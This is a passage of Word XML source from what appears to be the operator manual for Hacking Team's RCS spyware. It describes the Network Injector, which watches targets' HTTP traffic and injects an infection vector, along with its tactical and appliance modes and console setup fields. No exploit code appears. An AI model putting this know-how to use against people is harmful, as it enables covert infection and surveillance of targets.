    <w:p w:rsidR="00667412" w:rsidRDefault="00667412" w:rsidP="00667412">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D363D" w:rsidRPr="002D7F2D" w:rsidRDefault="009D363D" w:rsidP="009D363D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The Network Injector Agent is available for 3 platforms: Linux, OSX and Windows.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00667412" w:rsidRPr="002D7F2D" w:rsidRDefault="00667412" w:rsidP="00667412">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00667412" w:rsidRPr="002D7F2D" w:rsidRDefault="0029192C" w:rsidP="00667412">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="it-IT"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="4017600" cy="3240000"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>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17600" cy="3240000"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00667412" w:rsidRPr="002D7F2D" w:rsidRDefault="00667412" w:rsidP="00667412">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="8"/>
          <w:szCs w:val="8"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00667412" w:rsidRPr="002D7F2D" w:rsidRDefault="0010013A" w:rsidP="00667412">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>5.7</w:t>
      </w:r>
      <w:r w:rsidR="00667412" w:rsidRPr="002D7F2D">
        <w:rPr>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> [ RCS Console ] Operations &gt; </w:t>
      </w:r>
      <w:r w:rsidR="00667412" w:rsidRPr="002D7F2D">
        <w:rPr>
          <w:i/>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t># Operation #</w:t>
      </w:r>
      <w:r w:rsidR="00667412" w:rsidRPr="002D7F2D">
        <w:rPr>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> &gt; </w:t>
      </w:r>
      <w:r w:rsidR="00667412" w:rsidRPr="002D7F2D">
        <w:rPr>
          <w:i/>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t># Target #</w:t>
      </w:r>
      <w:r w:rsidR="00667412" w:rsidRPr="002D7F2D">
        <w:rPr>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> &gt; </w:t>
      </w:r>
      <w:r w:rsidR="00667412" w:rsidRPr="002D7F2D">
        <w:rPr>
          <w:i/>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t># Factory #</w:t>
      </w:r>
      <w:r w:rsidR="00667412" w:rsidRPr="002D7F2D">
        <w:rPr>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> &gt; Build (</w:t>
      </w:r>
      <w:r w:rsidR="00667412">
        <w:rPr>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Network Injector</w:t>
      </w:r>
      <w:r w:rsidR="00667412" w:rsidRPr="002D7F2D">
        <w:rPr>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D3DBC" w:rsidRDefault="002D3DBC" w:rsidP="00134262">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D665D2" w:rsidRDefault="00D665D2" w:rsidP="00134262">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="006954F7" w:rsidRDefault="006954F7" w:rsidP="00134262">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The Network Injector monitors all Target’s device HTTP connections and - through previously created injection rules - identifies Target’s connection and injects the infection vector.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006954F7" w:rsidRDefault="006954F7" w:rsidP="00134262">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="006954F7" w:rsidRDefault="006954F7" w:rsidP="006954F7">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>This Agent is available in 2 modes: Tactical Network Injector (TNI) and Network Injector Appliance</w:t>
      </w:r>
      <w:r w:rsidR="00655D04">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> (NIA)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00655D04">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">The functioning principle is identical, the only difference is that the TNI is intended to be used for tactical activities (limited to few Targets), while the NIA should be used for </w:t>
      </w:r>
      <w:r w:rsidR="00655D04">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>the monitoring of a large number of Targets</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006954F7" w:rsidRDefault="006954F7" w:rsidP="00134262">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="006C7288" w:rsidRDefault="009D363D" w:rsidP="00134262">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>As the</w:t>
      </w:r>
      <w:r w:rsidR="00AB603F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Network Injector requires</w:t>
      </w:r>
      <w:r w:rsidR="00D665D2">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> a more in-depth configuration in order to be used</w:t>
      </w:r>
      <w:r w:rsidR="006954F7">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00D665D2">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">there’s a specific section within the Console (System </w:t>
      </w:r>
      <w:r w:rsidR="006954F7">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt; Network Injectors) and it’s explained </w:t>
      </w:r>
      <w:r w:rsidR="00827343">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>starting from</w:t>
      </w:r>
      <w:r w:rsidR="006954F7">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0010013A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>page 47.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006954F7" w:rsidRDefault="006954F7">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00FC7C23" w:rsidRDefault="00FC7C23">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:sectPr w:rsidR="00FC7C23" w:rsidSect="00CE07E2">
          <w:headerReference w:type="default" r:id="rId200"/>
          <w:pgSz w:w="11906" w:h="16838" w:code="9"/>
          <w:pgMar w:top="1418" w:right="1134" w:bottom="1134" w:left="1134" w:header="709" w:footer="709" w:gutter="0"/>
          <w:cols w:space="708"/>
          <w:docGrid w:linePitch="360"/>
        </w:sectPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C87FEC" w:rsidRDefault="00C87FEC" w:rsidP="00C87FEC">
      <w:pPr>
        <w:pStyle w:val="Titolo1"/>
      </w:pPr>
      <w:bookmarkStart w:id="25" w:name="_Toc372642498"/>
      <w:r w:rsidRPr="00F008EB">
        <w:lastRenderedPageBreak/>
        <w:t>Tactical Network Injector (TNI)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="25"/>
    </w:p>
    <w:p w:rsidR="00BD2F08" w:rsidRDefault="007A77EE" w:rsidP="00F75689">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidR="006954F7">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Tactical </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Network Injector </w:t>
      </w:r>
      <w:r w:rsidR="00BD2F08">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">is an optional RCS </w:t>
      </w:r>
      <w:r w:rsidR="007B5E61">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">component </w:t>
      </w:r>
      <w:r w:rsidR="00BD2F08">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>that must be installed by System Administrator role within the “System &gt; Network Injectors” section.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006954F7" w:rsidRDefault="006954F7" w:rsidP="00F75689">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00670BF0" w:rsidRDefault="00670BF0" w:rsidP="00F75689">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="it-IT"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="760D58BB" wp14:editId="79120660">
            <wp:extent cx="6120130" cy="3672205"/>
            <wp:effectExtent l="0" t="0" r="0" b="4445"/>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120130" cy="3672205"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00670BF0" w:rsidRPr="002D7F2D" w:rsidRDefault="00670BF0" w:rsidP="00670BF0">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="8"/>
          <w:szCs w:val="8"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00670BF0" w:rsidRPr="002D7F2D" w:rsidRDefault="0010013A" w:rsidP="00670BF0">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>6.</w:t>
      </w:r>
      <w:r w:rsidR="00670BF0">
        <w:rPr>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="00670BF0" w:rsidRPr="002D7F2D">
        <w:rPr>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> [ RCS Console ] </w:t>
      </w:r>
      <w:r w:rsidR="00670BF0">
        <w:rPr>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>System &gt; Network Injectors</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007B5E61" w:rsidRDefault="007B5E61" w:rsidP="00F75689">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="007B5E61" w:rsidRDefault="007B5E61" w:rsidP="00F75689">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3"/>
        <w:gridCol w:w="5082"/>
      </w:tblGrid>
      <w:tr w:rsidR="007B5E61" w:rsidTr="007B5E61">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4263" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="007B5E61" w:rsidRDefault="003A4380" w:rsidP="00E62E16">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="8"/>
                <w:szCs w:val="8"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:object w:dxaOrig="1440" w:dyaOrig="1440">
                <v:shape id="_x0000_s1337" type="#_x0000_t75" style="position:absolute;left:0;text-align:left;margin-left:0;margin-top:0;width:187.5pt;height:153.75pt;z-index:251857920;mso-position-horizontal:left;mso-position-horizontal-relative:margin;mso-position-vertical:top;mso-position-vertical-relative:margin">
                  <v:imagedata r:id="rId202" o:title=""/>
                  <w10:wrap type="square" anchorx="margin" anchory="margin"/>
                </v:shape>
                <o:OLEObject Type="Embed" ProgID="PBrush" ShapeID="_x0000_s1337" DrawAspect="Content" ObjectID="_1446455372" r:id="rId203"/>
              </w:object>
            </w:r>
          </w:p>
          <w:p w:rsidR="007B5E61" w:rsidRDefault="007B5E61" w:rsidP="00E62E16">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="8"/>
                <w:szCs w:val="8"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="007B5E61" w:rsidRPr="00A52C9B" w:rsidRDefault="0010013A" w:rsidP="00111E7F">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="8"/>
                <w:szCs w:val="8"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>6.</w:t>
            </w:r>
            <w:r w:rsidR="00111E7F">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r w:rsidR="007B5E61" w:rsidRPr="002D7F2D">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> [ RCS Console ] </w:t>
            </w:r>
            <w:r w:rsidR="007B5E61">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>System &gt; Network Injectors &gt; New Injector</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5082" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="007B5E61" w:rsidRPr="00F43991" w:rsidRDefault="007B5E61" w:rsidP="00E62E16">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="007B5E61" w:rsidRPr="00F43991" w:rsidRDefault="007B5E61" w:rsidP="00E62E16">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="007B5E61" w:rsidRPr="00F43991" w:rsidRDefault="007B5E61" w:rsidP="00790EB8">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F43991">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">[ </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Name</w:t>
            </w:r>
            <w:r w:rsidRPr="00F43991">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> ]</w:t>
            </w:r>
            <w:r w:rsidR="001830A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> is the Network Injector’s name.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="007B5E61" w:rsidRPr="00F43991" w:rsidRDefault="007B5E61" w:rsidP="00E62E16">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="007B5E61" w:rsidRPr="00F43991" w:rsidRDefault="007B5E61" w:rsidP="00E62E16">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F43991">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">[ </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Description</w:t>
            </w:r>
            <w:r w:rsidRPr="00F43991">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> ]</w:t>
            </w:r>
            <w:r w:rsidR="00790EB8">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00790EB8" w:rsidRPr="00941484">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">is a not mandatory field to be used for storing additional information about the </w:t>
            </w:r>
            <w:r w:rsidR="00790EB8">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Network Injector</w:t>
            </w:r>
            <w:r w:rsidR="00790EB8" w:rsidRPr="00941484">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="007B5E61" w:rsidRPr="00F43991" w:rsidRDefault="007B5E61" w:rsidP="00E62E16">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="007B5E61" w:rsidRPr="00F43991" w:rsidRDefault="007B5E61" w:rsidP="00E62E16">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F43991">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">[ </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Address</w:t>
            </w:r>
            <w:r w:rsidRPr="00F43991">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> ]</w:t>
            </w:r>
            <w:r w:rsidR="00C61678">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> is the IP address of the Network Injector.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="007B5E61" w:rsidRPr="00F43991" w:rsidRDefault="007B5E61" w:rsidP="00E62E16">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="007B5E61" w:rsidRDefault="007B5E61" w:rsidP="007B5E61">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F43991">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">[ </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Port</w:t>
            </w:r>
            <w:r w:rsidRPr="00F43991">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> ]</w:t>
            </w:r>
            <w:r w:rsidR="00C61678">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> is the communication port on which the Network Injector is listening (443 is the default port).</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="007B5E61" w:rsidRPr="00F43991" w:rsidRDefault="007B5E61" w:rsidP="007B5E61">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="007B5E61" w:rsidRPr="00F43991" w:rsidRDefault="007B5E61" w:rsidP="00C61678">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F43991">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">[ </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Monitor via network Controller</w:t>
            </w:r>
            <w:r w:rsidRPr="00F43991">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> ]</w:t>
            </w:r>
            <w:r w:rsidR="00C61678">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> if selected, the Network Injector connectivity will be verified in the Monitor section.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00F75689" w:rsidRDefault="004805E8" w:rsidP="00F75689">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">In order to install a new </w:t>
      </w:r>
      <w:r w:rsidR="00DA7E05">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Tactical </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Network Injector within the RCS Console, you must ensure that you’ve already installed the laptop provided </w:t>
      </w:r>
      <w:r w:rsidR="00B7678B">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">by hacking Team </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>and connected it to the RCS Backend’s LAN</w:t>
      </w:r>
      <w:r w:rsidR="00732043">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, using one of the 4 network cards available.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DA7E05" w:rsidRDefault="00DA7E05" w:rsidP="00F75689">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00DA7E05" w:rsidRDefault="00DA7E05" w:rsidP="00F75689">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The installation of the Tactical Network Injector laptop is an extremely simply operation: y</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA7E05">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ou just need to boot the system fro</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>m the DVD provided and follow installation steps.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004805E8" w:rsidRDefault="004805E8" w:rsidP="00F75689">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="004805E8" w:rsidRDefault="004805E8" w:rsidP="00F75689">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
